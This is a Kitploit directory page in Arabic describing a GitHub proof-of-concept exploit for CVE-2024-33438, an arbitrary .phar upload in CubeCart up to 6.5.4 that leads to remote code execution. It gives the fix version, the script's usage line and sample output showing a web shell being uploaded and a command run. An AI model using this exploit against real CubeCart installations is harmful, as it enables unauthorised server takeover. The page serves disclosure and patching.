Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-33438 — CubeCart <= 6.5.4 عرضة لتحميل ملف عشوائي يؤدي إلى تنفيذ تعليمات برمجية عن بعد (RCE). | Kitploit
أدوات/GitHubGitHub/julio-cfa/cve-2024-33438
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubjulio-cfa/cve-2024-33438

CVE-2024-33438

CubeCart <= 6.5.4 عرضة لتحميل ملف عشوائي يؤدي إلى تنفيذ تعليمات برمجية عن بعد (RCE).

عرض المستودع
345منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

رفع ملف تعسفي يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (CVE-2024-33438)

CubeCart <= 6.5.4 معرض لمشكلة رفع ملف تعسفي تؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE). تؤثر الثغرة على مدير الملفات الخاص بالتطبيق ومرشحاته من خلال السماح للمهاجمين برفع ملفات .phar تحتوي على تعليمات برمجية ضارة. يجب تحديث CubeCart إلى الإصدار 6.5.5 لأنه يطبق تصحيحًا أمنيًا لإصلاح هذه الثغرة.

لمزيد من التفاصيل، يُرجى الاطلاع على الإعلان الرسمي من CubeCart في المراجع.

الاستغلال

تم إنشاء إثبات مفهوم آلي (PoC)، ولكن يمكن أيضًا استغلال هذه الثغرة يدويًا عن طريق رفع ملف .phar ضار عبر مدير الملفات.

هذه هي طريقة استخدام إثبات المفهوم:

Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

بعد تشغيله، هذا هو المخرجات المتوقعة لاستغلال ناجح:

python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data

المراجع

  • https://forums.cubecart.com/topic/59046-cubecart-655-released-minor-security-update/
  • https://github.com/cubecart/v6/issues/3570
  • https://github.com/cubecart/v6/commit/31a5ec39b0924b2111fbc3aa419bd8c5c3fc1841
  • https://www.cve.org/CVERecord?id=CVE-2024-33438
  • http://blog.cat22.io/blog/cve/cve-2024-33438.html
تنزيل الأداة